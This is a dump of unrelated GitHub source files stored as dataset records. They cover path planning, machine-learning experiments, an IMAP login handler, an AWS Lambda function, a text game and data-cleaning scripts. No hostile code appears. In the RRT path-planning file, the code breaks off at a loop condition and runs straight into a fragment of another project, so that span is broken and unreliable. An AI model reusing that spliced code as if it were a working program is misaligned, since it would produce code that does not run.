quit_game=False\r\n death_count = 0\r\n while not quit_game:\r\n game = Game(joystick)\r\n game.run(death_count)\r\n death_count += 1\r\n","repo_name":"wolf3213/The-limit","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24075235309","text":"'''\r\nSTAGE 3\r\nno max distance\r\nno closest node check\r\nno tree like structure\r\n'''\r\nimport matplotlib.pyplot as plt\r\n# import shapely\r\nfrom shapely.geometry import LineString\r\nfrom shapely.geometry import Polygon\r\n# from shapely.geometry import MultiPolygon as mpg\r\nfrom shapely.geometry import Point\r\nimport random\r\n\r\nclass Node:\r\n # for parent node\r\n parent = None\r\n # for new random node\r\n newNode = None \r\n # for position\r\n position = None\r\n # accepts parent node and new random node of type Point\r\n def __init__(self, parent, newNode, position):\r\n self.parent = parent\r\n self.newNode = newNode\r\n self.position = position\r\n\r\n # parent is a node\r\n # newNode = Node()\r\n # position and parent attribs\r\n # Parent = Node()\r\n # newNode.parent = newNode\r\n # using the object of the next Point\r\n # pass\r\n\r\n# function to return True if new Node isnt Present in any obstacle, \r\n# else False\r\ndef isNodeOkay(newNode):\r\n isOkay = True\r\n for obs in obsList:\r\n if newNode.within(obs):\r\n isOkay = False\r\n # print('Node is Not Okay')\r\n return isOkay\r\n return isOkay\r\n\r\n# function to check if line crosses another Obstacle\r\n# returns true if no cross\r\ndef isLineOkay(newLine):\r\n isOkay = True\r\n for obs in obsList:\r\n if newLine.crosses(obs):\r\n isOkay = False\r\n # print('Line is Not Okay')\r\n return isOkay\r\n return isOkay\r\n\r\ndef plotter(path):\r\n pass\r\n\r\n# sample goal after x interval\r\ndef goalSampler(itr):\r\n pass\r\n\r\n# function to repeat procedure 5 times\r\n'''\r\nPROCEDURE:\r\n choosing random point in given range\r\n\r\n convert point into node using class, pass parent and new node\r\n checking if it lies inside given obstacle list\r\n checking if line crosses any obstacle\r\n adding it to path\r\n traversing to start of \r\n plotting path\r\n'''\r\ndef driver(n, start, goal, d):\r\n plt.scatter(start.x, start.y, marker='x', color='yellow')\r\n plt.scatter(goal.x, goal.y, marker='x', color='green')\r\n # parent = Node()\r\n # newnode = Node(parent);\r\n\r\n path = []\r\n path.append(start)\r\n # node to calculate distance\r\n prev = start\r\n # keep track of number of nodes placed\r\n nodeCtr=0\r\n itr=0\r\n goalSampleCtr = 0\r\n while nodeCtr %f' % (\n (norm_key, task.name), svm_dct['task_error']))\n\n dct = self._results['retrain_classifier_image_match_indexed']\n dct.setdefault(norm_key, {})\n if task.name in dct[norm_key]:\n warn('Overwriting retrain_classifier_image_match_indexed result: %s'\n % task.name)\n dct[norm_key][task.name] = svm_dct\n return svm_dct\n\n def loss_image_match_indexed(self, svm_dct, task):\n norm_task = svm_dct['norm_task']\n norm_key = svm_dct['norm_key']\n\n info('loss_image_match_indexed: %s, %s' % (norm_key, task.name) )\n x = self.normalized_image_match_features(task, svm_dct, 'test',\n # -- assume that slow features were caught earlier\n batched_lmap_speed_thresh={'seconds': 30, 'elements': 1},\n )\n svm_dct['ens'].add_sample(task.name, task.y)\n svm_dct['ens'].add_features(norm_key, task.name, x)\n\n self.load_ensemble_grams(norm_task, svm_dct['ens'], task.name,\n svm_dct['ens'].train_sample)\n svm_dct['ens'].compute_gram(norm_key, task.name,\n svm_dct['ens'].train_sample, dtype='float32')\n\n preds = svm_dct['ens'].predict(task.name)\n erate = error_rate(preds, task.y)\n info('test_image_match_indexed error_rate %s -> %f' % (\n task.name, erate))\n\n # -- add summary information to self._results\n dct = self._results['loss_image_match_indexed']\n dct.setdefault(norm_key, {})\n if task.name in dct[norm_key]:\n warn('Overwriting loss_image_match_indexed result: %s'\n % task.name)\n dct[norm_key][task.name] = {\n 'error_rate': erate,\n 'norm_key': norm_key,\n 'task_name': task.name,\n 'preds_01': ''.join(\n ['0' if p == -1 else '1' for p in preds]),\n }\n return erate\n\n","repo_name":"hyperopt/hyperopt-convnet","sub_path":"hpconvnet/slm_visitor_esvc.py","file_name":"slm_visitor_esvc.py","file_ext":"py","file_size_in_byte":16738,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"67"} +{"seq_id":"30443140569","text":"import datetime\nimport getpass\nfrom imapclient import IMAPClient\nfrom socket import gaierror, error as socket_error\nfrom ssl import SSLError\n\nimport sqlalchemy.orm.exc\n\nfrom inbox.log import get_logger\nlog = get_logger()\n\nfrom inbox.auth.base import AuthHandler\nimport inbox.auth.starttls\nfrom inbox.basicauth import (ConnectionError, ValidationError,\n TransientConnectionError,\n UserRecoverableConfigError)\nfrom inbox.models import Namespace\nfrom inbox.models.backends.generic import GenericAccount\nfrom inbox.providers import provider_info\n\n\nPROVIDER = 'generic'\nAUTH_HANDLER_CLS = 'GenericAuthHandler'\n\n\nclass GenericAuthHandler(AuthHandler):\n def create_account(self, db_session, email_address, response):\n try:\n account = db_session.query(GenericAccount).filter_by(\n email_address=email_address).one()\n except sqlalchemy.orm.exc.NoResultFound:\n namespace = Namespace()\n account = GenericAccount(namespace=namespace)\n\n account.email_address = response['email']\n account.password = response['password']\n account.date = datetime.datetime.utcnow()\n\n provider_name = self.provider_name\n account.provider = provider_name\n if provider_name == 'custom':\n account.imap_endpoint = (response['imap_server_host'],\n response['imap_server_port'])\n account.smtp_endpoint = (response['smtp_server_host'],\n response['smtp_server_port'])\n\n # Ensure account has sync enabled after authing.\n account.enable_sync()\n\n return account\n\n def connect_account(self, email, credential, imap_endpoint,\n account_id=None):\n \"\"\"Provide a connection to a generic IMAP account.\n\n Raises\n ------\n ConnectionError\n If we cannot connect to the IMAP host.\n TransientConnectionError\n Sometimes the server bails out on us. Retrying may\n fix things.\n ValidationError\n If the credentials are invalid.\n \"\"\"\n host, port = imap_endpoint\n try:\n conn = IMAPClient(host, port=port, use_uid=True, ssl=(port == 993))\n if port != 993:\n # Raises an exception if TLS can't be established\n conn._imap.starttls()\n except IMAPClient.AbortError as e:\n log.error('account_connect_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error=\"[ALERT] Can't connect to host - may be transient\")\n raise TransientConnectionError(str(e))\n except(IMAPClient.Error, gaierror, socket_error) as e:\n log.error('account_connect_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error='[ALERT] (Failure): {0}'.format(str(e)))\n raise ConnectionError(str(e))\n\n try:\n conn.login(email, credential)\n except IMAPClient.AbortError as e:\n log.error('account_verify_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error=\"[ALERT] Can't connect to host - may be transient\")\n raise TransientConnectionError(str(e))\n except IMAPClient.Error as e:\n # Providers like Yahoo sometimes throw harmless\n # invalid connection errors.\n error_msgs = provider_info(\n self.provider_name).get('transient_error_messages', [])\n\n if str(e) in error_msgs:\n log.warning('account_verify_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error='Transient auth error',\n transient_message=str(e))\n raise TransientConnectionError(str(e))\n else:\n log.error('account_verify_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error='[ALERT] Invalid credentials (Failure)')\n raise ValidationError(str(e))\n except SSLError as e:\n log.error('account_verify_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error='[ALERT] SSL Connection error (Failure)')\n raise ConnectionError(str(e))\n\n return conn\n\n def _supports_condstore(self, conn):\n \"\"\"Check if the connection supports CONDSTORE\n Returns\n -------\n True: If the account supports CONDSTORE\n False otherwise\n \"\"\"\n capabilities = conn.capabilities()\n if \"CONDSTORE\" in capabilities:\n return True\n\n return False\n\n def verify_account(self, account):\n \"\"\"Verifies a generic IMAP account by logging in and logging out.\n\n Note: Raises exceptions from connect_account() on error.\n\n Returns\n -------\n True: If the client can successfully connect.\n \"\"\"\n conn = self.connect_account(account.email_address,\n account.password,\n account.imap_endpoint)\n info = account.provider_info\n if \"condstore\" not in info:\n if self._supports_condstore(conn):\n account.supports_condstore = True\n try:\n conn.list_folders()\n except Exception as e:\n log.error(\"account_folder_list_failed\",\n email=account.email_address,\n account_id=account.id,\n error=e.message)\n raise UserRecoverableConfigError(\"Full IMAP support is not \"\n \"enabled for this account. \"\n \"Please contact your domain \"\n \"administrator and try again.\")\n finally:\n conn.logout()\n return True\n\n def interactive_auth(self, email_address):\n password_message = 'Password for {0} (hidden): '\n pw = ''\n while not pw:\n pw = getpass.getpass(password_message.format(email_address))\n\n response = dict(email=email_address, password=pw)\n\n if self.provider_name == 'custom':\n imap_server_host = raw_input('IMAP server host: ').strip()\n imap_server_port = raw_input('IMAP server port: ').strip() or 993\n smtp_server_host = raw_input('SMTP server host: ').strip()\n smtp_server_port = raw_input('SMTP server port: ').strip() or 587\n response.update(imap_server_host=imap_server_host,\n imap_server_port=imap_server_port,\n smtp_server_host=smtp_server_host,\n smtp_server_port=smtp_server_port)\n\n return response\n","repo_name":"PriviPK/privipk-sync-engine","sub_path":"inbox/auth/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":7451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71624032855","text":"import json, boto3, os\n\n\ndef create_user(data):\n try:\n table = boto3.resource('dynamodb').Table(os.getenv('users_table'))\n response = table.put_item(\n Item = {\n 'id': data['id'],\n 'email': data['email'],\n 'name': data['name'],\n 'phone': data['phone']\n }\n )\n return [True, response]\n \n except Exception as e:\n return [False, e]\n\n\ndef lambda_handler(event, context):\n if event['body'] is not None:\n body = json.loads(event['body'])\n \n else:\n return {\n \"statusCode\": 400,\n \"body\": json.dumps(\n {\n 'Message': 'Request body is missing.',\n }\n )\n }\n \n if 'id' not in body or 'email' not in body or 'name' not in body or 'phone' not in body:\n return {\n \"statusCode\": 400,\n \"body\": json.dumps(\n {\n 'Message': 'Id, email, name or phone is missing.',\n }\n )\n }\n \n if 'Item' not in boto3.resource('dynamodb').Table(os.getenv('users_table')).get_item(Key={'id': body['id']}):\n result = create_user(body)\n if result[0]:\n return {\n \"statusCode\": 201,\n \"body\": json.dumps(\n {\n 'Message': 'User created successfully.',\n }\n )\n }\n \n else:\n return {\n \"statusCode\": 400,\n \"body\": json.dumps(\n {\n 'Message': 'Something went wrong.',\n 'Exception': str(result[1]),\n }\n )\n }\n \n else:\n return {\n \"statusCode\": 400,\n \"body\": json.dumps(\n {\n 'Message': 'User already exists.',\n }\n )\n }\n","repo_name":"ma593y/aws-with-serverless-framework","sub_path":"aws-serverless-rest-apis/users_handlers/post_users.py","file_name":"post_users.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"35218068036","text":"import setuptools\nfrom pathlib import Path\n\n\nworkdir = Path(__file__).parent.absolute() / 'axDo/workdirs/dev'\nworkdir.mkdir(parents=True, exist_ok=True)\nworkdir = Path(__file__).parent.absolute() / 'axDo/results'\nworkdir.mkdir(parents=True, exist_ok=True)\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"EEG-Cluster\", # Replace with your own username\n version=\"0.1\",\n author=\"xavante\",\n author_email=\"xavante.erickson@gmail.com\",\n description=\"mvpa_package for Lund university\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n entry_points = {\n 'console_scripts': ['eray=SetupCluster:main'],\n },\n packages=setuptools.find_packages(exclude=[\"data\", \"documents\", \"Old\", \"Orchestration\", \"Plotting\", \"ReadableMatlab\"]),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: POSIX :: Linux\",\n ],\n python_requires='>=3.8.5',\n install_requires=[\n 'ray==1.2.0',\n 'scipy==1.6.1',\n 'scikit-learn==0.24.1',\n 'scikit-image==0.18.1',\n 'openstacksdk>=0.54.0',\n 'accelerator',\n ]\n)","repo_name":"Xavantex/masterthesiseeganalysis","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19296022737","text":"import random\nfrom tkinter.tix import Tree\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom get_data import get_data\nfrom models import DecisionTree, node_score_error, node_score_entropy, node_score_gini\n\n\ndef loss_plot(ax, title, tree, pruned_tree, train_data, test_data):\n '''\n Example plotting code. This plots four curves: the training and testing\n average loss using tree and pruned tree.\n You do not need to change this code!\n Arguments:\n - ax: A matplotlib Axes instance.\n - title: A title for the graph (string)\n - tree: An unpruned DecisionTree instance\n - pruned_tree: A pruned DecisionTree instance\n - train_data: Training dataset returned from get_data\n - test_data: Test dataset returned from get_data\n '''\n fontsize=8\n ax.plot(tree.loss_plot_vec(train_data), label='train non-pruned')\n ax.plot(tree.loss_plot_vec(test_data), label='test non-pruned')\n ax.plot(pruned_tree.loss_plot_vec(train_data), label='train pruned')\n ax.plot(pruned_tree.loss_plot_vec(test_data), label='test pruned')\n\n\n ax.locator_params(nbins=3)\n ax.set_xlabel('number of nodes', fontsize=fontsize)\n ax.set_ylabel('loss', fontsize=fontsize)\n ax.set_title(title, fontsize=fontsize)\n legend = ax.legend(loc='upper center', shadow=True, fontsize=fontsize-2)\n\ndef explore_dataset(filename, class_name):\n train_data, validation_data, test_data = get_data(filename, class_name)\n\n # TODO: Print 12 loss values associated with the dataset.\n # For each measure of gain (training error, entropy, gini):\n # (a) Print average training loss (not-pruned)\n # (b) Print average test loss (not-pruned)\n # (c) Print average training loss (pruned)\n # (d) Print average test loss (pruned)\n decision_tree_ent = DecisionTree(data=train_data, validation_data=None, gain_function=node_score_entropy)\n print(\"entropy non pruned train\", decision_tree_ent.loss(train_data)) # average training loss\n print(\"entropy non pruned test\", decision_tree_ent.loss(test_data))\n\n p_decision_tree_ent = DecisionTree(data=train_data, validation_data=validation_data, gain_function=node_score_entropy)\n print(\"entropy pruned train\", p_decision_tree_ent.loss(train_data)) # average training loss\n print(\"entropy pruned test\", p_decision_tree_ent.loss(test_data))\n\n decision_tree_train = DecisionTree(data=train_data, validation_data=None, gain_function=node_score_error)\n print(\"training error non pruned train\", decision_tree_train.loss(train_data)) # average training loss\n print(\"training error non pruned test\", decision_tree_train.loss(test_data))\n\n p_decision_tree_train = DecisionTree(data=train_data, validation_data=validation_data, gain_function=node_score_error)\n print(\"training error pruned train\", p_decision_tree_train.loss(train_data)) # average training loss\n print(\"training error pruned test\", p_decision_tree_train.loss(test_data))\n\n decision_tree_gini = DecisionTree(data=train_data, validation_data=None, gain_function=node_score_gini)\n print(\"gini non pruned train\", decision_tree_gini.loss(train_data)) # average training loss\n print(\"gini non pruned test\", decision_tree_gini.loss(test_data))\n\n p_decision_tree_gini = DecisionTree(data=train_data, validation_data=validation_data, gain_function=node_score_gini)\n print(\"gini pruned train\", p_decision_tree_gini.loss(train_data)) # average training loss\n print(\"gini pruned test\", p_decision_tree_gini.loss(test_data))\n\n\n # TODO: Feel free to print or plot anything you like here. Just comment\n # make sure to comment it out, or put it in a function that isn't called\n # by default when you hand in your code!\n # figure,axes = plt.subplots(1,3)\n\n # entropy_graph = loss_plot(axes[0],\"entropy gain\", decision_tree_ent, p_decision_tree_ent, train_data, test_data)\n # train_graph = loss_plot(axes[1],\"train error\", decision_tree_train, p_decision_tree_train, train_data, test_data)\n # gini_graph = loss_plot(axes[2],\"gini gain\", decision_tree_gini, p_decision_tree_gini, train_data, test_data)\n \n # # print(\"entropy\", decision_tree_ent[5],decision_tree_ent[10], \"train\", decision_tree_train[5], decision_tree_train[10], \"gini\", decision_tree_gini[5], decision_tree_gini[10])\n\n # plt.savefig(\"hw6_plots.png\")\n # plt.show()\n\n#for project report\ndef plot_loss(filename, class_name):\n train_data, validation_data, test_data = get_data(filename, class_name)\n # have to go through depths\n training_loss = []\n max_depths = list(range(1,16)) #values between 1 and 15\n \n #loop through values\n for x in range(1,16):\n decision_tree = DecisionTree(data=train_data,validation_data=None,gain_function=node_score_entropy, max_depth=x)\n training_loss.append(decision_tree.loss(train_data))\n \n plt.plot(max_depths,training_loss)\n plt.xlabel('max depth')\n plt.ylabel('training set loss')\n plt.title('maximum depth vs training loss')\n plt.show()\n\n\n\n\ndef main():\n ########### PLEASE DO NOT CHANGE THESE LINES OF CODE! ###################\n random.seed(1)\n np.random.seed(1)\n #########################################################################\n\n explore_dataset('data/chess.csv', 'won')\n explore_dataset('data/spam.csv', '1')\n\n ## TESTING DEPTH ##\n plot_loss('data/spam.csv', '1')\n\nmain()\n","repo_name":"avonderg/cs1420-boosting-trees","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10777616118","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 25 19:23:48 2019\n\n@author: adityapandey\n\"\"\"\nimport numpy as np\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nimport tensorflow as tf\n\nARelu_k=1\nARelu_n=1\n\ndef set_kn(k, n):\n global ARelu_k, ARelu_n\n ARelu_k = k\n ARelu_n = n\n\ndef ARelu(x):\n global ARelu_k, ARelu_n\n if x<=0:\n return -0.01 * ARelu_k * np.power(abs(x), ARelu_n)\n else: \n return ARelu_k * np.power(x, ARelu_n)\n \nnp_ARelu = np.vectorize(ARelu)\n\ndef d_ARelu(x):\n global ARelu_k, ARelu_n\n if x<=0:\n return -0.01 * ARelu_n * ARelu_k * np.power(abs(x), ARelu_n)\n else: \n return ARelu_n * ARelu_k * np.power(x, ARelu_n-1)\n \nnp_d_ARelu = np.vectorize(d_ARelu)\n\nnp_d_ARelu_32 = lambda x: np_d_ARelu(x).astype(np.float32)\n\ndef tf_d_ARelu(x, name=None):\n with tf.name_scope(name, \"d_ARelu\", [x]) as name:\n y = tf.py_func(np_d_ARelu_32,\n [x],\n [tf.float32],\n name=name,\n stateful=False)\n return y[0]\n\ndef py_func(func, inp, Tout, stateful=True, name=None, grad=None):\n\n # Need to generate a unique name to avoid duplicates:\n rnd_name = 'PyFuncGrad' + str(np.random.randint(0, 1E+8))\n\n tf.RegisterGradient(rnd_name)(grad)\n g = tf.get_default_graph()\n with g.gradient_override_map({\"PyFunc\": rnd_name}):\n return tf.py_func(func, inp, Tout, stateful=stateful, name=name)\n \ndef ARelugrad(op, grad):\n x = op.inputs[0]\n \n n_gr = tf_d_ARelu(x)\n return grad * n_gr\n\nnp_ARelu_32 = lambda x: np_ARelu(x).astype(np.float32)\n\ndef tf_ARelu(x, name=None):\n\n with tf.name_scope(name, \"ARelu\", [x]) as name:\n y = py_func(np_ARelu_32,\n [x],\n [tf.float32],\n name=name,\n grad=ARelugrad)\n return y[0]\n \n","repo_name":"adityapandey1998/Parabolic-Functions","sub_path":"A-ReLU/Leaky_AReLU.py","file_name":"Leaky_AReLU.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9116546495","text":"from GemasGame import Personaje\nfrom Guerreros import Samurai\nfrom Guerreros import Bombardero\n# Clase es la plantilla base esta contiene los atributos y los metodos.\n\n# Propiedades - Atributos\n# Estas propiedades me definen al objeto.\n\n# Funciones - Metodos\n# Las acciones que puede realizar el objeto.\n\n\n# Instanciamos desde el metodo constructor __init__\n# self,nombre,fuerza,inteligencia,defensa,vida\n\n# Los buenos\n# Pogy = Personaje(\"Pogy\",10,1,5,100)\nHormy = Personaje(\"🐜 Hormy\",10,1,5,100)\n# Los Malos\nVillanoide = Personaje(\"🦔 TopoTron\",8,5,3,100)\nVillanoide.volar = True\n\nprint(\"Inicializamos nuestros personajes\")\nprint(Hormy.atributos())\nprint(Villanoide.atributos())\n\nHormy.fuerza = Hormy.fuerza + 2\nprint(f\"La fuerza de {Hormy.nombre} es de: \",Hormy.fuerza)\nprint(\"🔎 Revisar atributos:\")\nHormy.atributos()\nprint(\"⏫ Aqui subimos de nivel:\")\nHormy.subirNivel(3,0,0)\nHormy.atributos()\nprint(\"👽 Quitar la vida por completo:\")\n# Hormy.__gameover()\nprint(\"Validamos si esta vivo:\")\nprint(Hormy.validarVivo())\nHormy.atributos()\n\nprint(\"🐜😤 Antes del ataque\")\nVillanoide.atributos()\nprint(Hormy.damage(Villanoide))\nprint(\"⚔ Realizamos el ataque\")\nHormy.atacar(Villanoide)\nprint(\"🐜🤕 Despues del ataque\")\nVillanoide.atributos()\n\n\nprint(\"🦔😤 Antes del ataque\")\nHormy.atributos()\nprint(Hormy.damage(Villanoide))\nprint(\"⚔ Realizamos el ataque\")\nVillanoide.atacar(Hormy)\nprint(\"🦔🤕 Despues del ataque\")\nHormy.atributos()\n\n\n\n# Hormy.atributos()\n# Villanoide.atacar(Hormy)\n\nprint(\"💥Inicializamos una nueva batalla💥\")\n\ngoldenBor = Personaje(\"GolBor 🥞\",30,48,30,100)\nsenShin = Samurai(\"SenShin 🤖\",50,10,5,100,30)\nTerriBol = Bombardero(\"Terribol 🦏\",20,30,5,100,50)\n\nprint(\"Antes de atacar 🥳\")\ngoldenBor.atributos()\nsenShin.atributos()\nTerriBol.atributos()\n\n\ngoldenBor.atacar(TerriBol)\nsenShin.atacar(goldenBor)\nTerriBol.atacar(senShin)\n\nprint(\"Despues de atacar 💥\")\ngoldenBor.atributos()\nsenShin.atributos()\nTerriBol.atributos()\n\n\n# Bot contra Bot\n\nBitBee = Samurai(\"BitBee 🐝\",20,10,4,1000,2)\nRockerTu = Bombardero(\"RockerTu 🐲\",5,15,4,1000,3)\n\ndef combate(player1,player2):\n ronda = 0\n while player1.validarVivo() and player2.validarVivo():\n print(\"Ronda: \", ronda)\n print(\"Accion de: \", player1.nombre)\n player1.atacar(player2)\n print(\"Accion de: \", player2.nombre)\n player2.atacar(player1)\n ronda = ronda + 1\n if player1.validarVivo():\n print(\"🏆 Ha ganado: \", player1.nombre)\n elif player2.validarVivo():\n print(\"🏆 Ha ganado: \", player2.nombre)\n else:\n \"Hubo un empate 😅\"\n\ncombate(BitBee,RockerTu)","repo_name":"Usernamek-dot/Python-course","sub_path":"sampleGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11896642488","text":"import itertools\nimport math\n\n\ndef find_sum_set(values, expected_sum, n_elements):\n \"\"\"\n Given a list of values, returns the product of the first n_elements found\n that sum expected_sum\n \"\"\"\n for pick in itertools.combinations(values, n_elements):\n if (sum(pick)) == expected_sum:\n return math.prod(pick)\n\n\nif __name__ == \"__main__\":\n values = []\n with open(\"../data/01.txt\") as fi:\n values = [int(v) for v in fi.readlines()]\n\n result_1 = find_sum_set(values, 2020, 2)\n print(result_1)\n\n result_2 = find_sum_set(values, 2020, 3)\n print(result_2)\n","repo_name":"cnluzon/advent-of-code","sub_path":"src/01_report_repair.py","file_name":"01_report_repair.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16240459957","text":"import pandas as pd\nimport os\n\n# multiple-use variables\nwz_taxonomy = pd.read_excel('../data/taxonomy/wz2008_taxonomy.xlsx', converters={'wz2008_code':str}) # file with codes and labels to serve as basis\nkldb_taxonomy = pd.read_excel('../data/taxonomy/kldb2010_taxonomy.xlsx', converters={'kldb2010_code':str, 'kldb2010_bereich_code':str}) # file with codes and labels to serve as basis\nregion_codes = ['d', '01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12', '13', '14', '15', '16'] # regions to be included in data processing\ndirectories_list = ['../data/raw/wz', '../data/raw/kldb']\n\n#%%\n\n'''\nBeschäftigte (SVB and GB)\n\nWHAT THIS PROCESS DOES:\nReads the files downloaded from the website of the Bundesagentur für Arbeit,\nreturns a new, cleaned file for every file read.\n\nREQUIREMENTS to run without errors or changes: \n 1. the original file naming system from the BA must be retained (e.g. wz-heft-d-0-202003-xlsx.xlsx)\n 2. the files must be located under /data/raw/wz or /data/raw/kldb\n'''\n\nfrom data_cleaning_functions import clean_besch_data_tabelleII\n\nvariables_list = ['SVB', 'GB'] # employment types to be included in the process (case sensitive)\n\nfor directory in directories_list:\n for filename in os.listdir(directory): # iterates through filenames in each directory\n if (filename.startswith('wz-heft-') or filename.startswith('bo-heft-')): # avoid reading irrelevant files\n for variable in variables_list:\n \n # read and clean file\n df = pd.read_excel(f'{directory}/{filename}', sheet_name=f'{variable} - Tabelle II') \n \n # define new filename length according to region\n if '-d-' in filename or '-w-' in filename or '-o-' in filename:\n name_length = 18\n else:\n name_length = 19\n \n # clean and export files\n if 'wz' in filename:\n df_cleaned = clean_besch_data_tabelleII(df, variable, 'wz')\n new_filename = f'{filename[:name_length]}_{str.lower(variable)}_tabelle2.csv'\n df_cleaned.to_csv(f'../data/processing/wz/{new_filename}', index=False) \n print(f'Exported: {new_filename} to data/processing/wz')\n \n elif 'bo' in filename:\n df_cleaned = clean_besch_data_tabelleII(df, variable, 'kldb')\n new_filename = f'kldb-{filename[3:name_length]}_{str.lower(variable)}_tabelle2.csv'\n df_cleaned.to_csv(f'../data/processing/kldb/{new_filename}', index=False) \n print(f'Exported: {new_filename} to data/processing/kldb')\n\n else:\n print('File not cleaned or exported')\n \n\n#%%\n\n'''\nBegonnene sozialversicherungspflichtige Beschäftigungsverhältnisse\n\nWHAT THIS PROCESS DOES:\nReads the files acquired from the Bundesagentur für Arbeit,\nreturns a new, cleaned file for every file read.\n\nREQUIREMENTS to run without errors or changes: \n 1. the original 'standard' table formatting of the BA must be retained (i.e. contents of the excel file acquired from the BA must not be altered)\n 2. the file name must be: {stat_type}_{region}_begBesch (e.g. wz_d_begBesch.xlsx)\n 3. the sheet name containing the data in the files must be: Beg.BV_Svpfl_WZ2008 (for WZ) or Beg.BV_Svpfl_KldB2010 (for KldB)\n 4. the files must be located under /data/raw/wz or /data/raw/kldb\n \n Alternatively, an already cleaned version of the file can be placed in data/processing with the following requirements:\n Name of the file: {stat_type}_{region}_begBesch.csv (e.g. kldb_08_begBesch.csv or wz_d_begBesch.csv)\n Name of the column containing the WZ or KldB codes: wz2008_code or kldb2010_code\n'''\n\nfrom data_cleaning_functions import clean_begBesch_data\n\n\nfor directory in directories_list:\n for filename in os.listdir(directory): # iterates through filenames in each directory\n for region in region_codes:\n if f'{region}_begBesch' in filename: # avoid reading irrelevant files\n \n if 'wz' in filename:\n df_master = pd.read_excel(f'{directory}/{filename}', sheet_name='Beg.BV_Svpfl_WZ2008')\n \n # clean the dataframe\n df = clean_begBesch_data(df_master.copy(), 'wz')\n \n # add taxonomy information and merge\n df_base = wz_taxonomy.copy()\n df_base = df_base['wz2008_code']\n df = df.merge(df_base, on='wz2008_code', how='left')\n \n # export new file\n new_filename = f'wz_{region}_begBesch.csv'\n df.to_csv(f'../data/processing/wz/{new_filename}', index=False)\n print(f'Exported: {new_filename} to data/processing/wz')\n \n if 'kldb' in filename:\n df_master = pd.read_excel(f'{directory}/{filename}', sheet_name='Beg.BV_Svpfl_KldB2010')\n \n # clean the dataframe\n df = clean_begBesch_data(df_master.copy(), 'kldb')\n \n # add taxonomy information and merge\n df_base = kldb_taxonomy.copy()\n df_base = df_base['kldb2010_code']\n df = df.merge(df_base, on='kldb2010_code', how='left')\n \n # export new file\n new_filename = f'kldb_{region}_begBesch.csv'\n df.to_csv(f'../data/processing/kldb/{new_filename}', index=False)\n print(f'Exported: {new_filename} to data/processing/kldb')\n\n\n#%%\n\n'''\nOnline Job Vacancies\n\nWHAT THIS PROCESS DOES:\nReads and cleans a single file containing the data,\nreturns unified file with ojv count by all WZ levels.\n\nREQUIREMENTS to run without errors or changes:\n 1. the file name must be: {stat_type}_{region}_ojv (e.g. wz_d_ojv.csv)\n 2. the column name must be either: wz2008_code or kldb2010_code\n 3. the files must be located under /data/raw/wz or /data/raw/kldb\n'''\n\nfrom data_cleaning_functions import clean_codes\n\nfor directory in directories_list:\n for filename in os.listdir(directory): # iterates through filenames in each directory\n for region in region_codes:\n if f'{region}_ojv' in filename: # avoid reading irrelevant files\n \n if 'wz' in filename:\n df_base = wz_taxonomy.copy() # import taxonomy file\n stat_type = 'wz'\n code = 'wz2008_code'\n \n if 'kldb' in filename:\n df_base = kldb_taxonomy.copy() # import taxonomy file\n stat_type = 'kldb'\n code_column = 'kldb2010_code'\n \n # read file with ojv data\n if (filename.endswith('xlsx')) | (filename.endswith('xls')):\n df_ojv = pd.read_excel(f'../data/raw/{stat_type}/{filename}')\n elif filename.endswith('csv'):\n df_ojv = pd.read_csv(f'../data/raw/{stat_type}/{filename}')\n \n \n # create dataframe for for each steller \n df2 = clean_codes(df_ojv.copy(), '2steller', stat_type)\n df3 = clean_codes(df_ojv.copy(), '3steller', stat_type)\n df4 = clean_codes(df_ojv.copy(), '4steller', stat_type)\n df5 = clean_codes(df_ojv.copy(), '5steller', stat_type)\n \n # append them to get single dataframe\n df_all = df2.append(df3)\n df_all = df_all.append(df4)\n df_all = df_all.append(df5)\n \n # merge to base dataframe\n df = df_base.merge(df_all, on=code, how='left')\n df = df.groupby([code, 'year'], as_index=False).sum()\n \n # export to file\n new_filename = f'{stat_type}_{region}_ojv.csv'\n df.to_csv(f'../data/processing/{stat_type}/{new_filename}', index=False)\n print(f'Exported: {new_filename} to data/processing')","repo_name":"bertelsmannstift/OJV-distribution-analyses","sub_path":"src/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"41146747538","text":"from 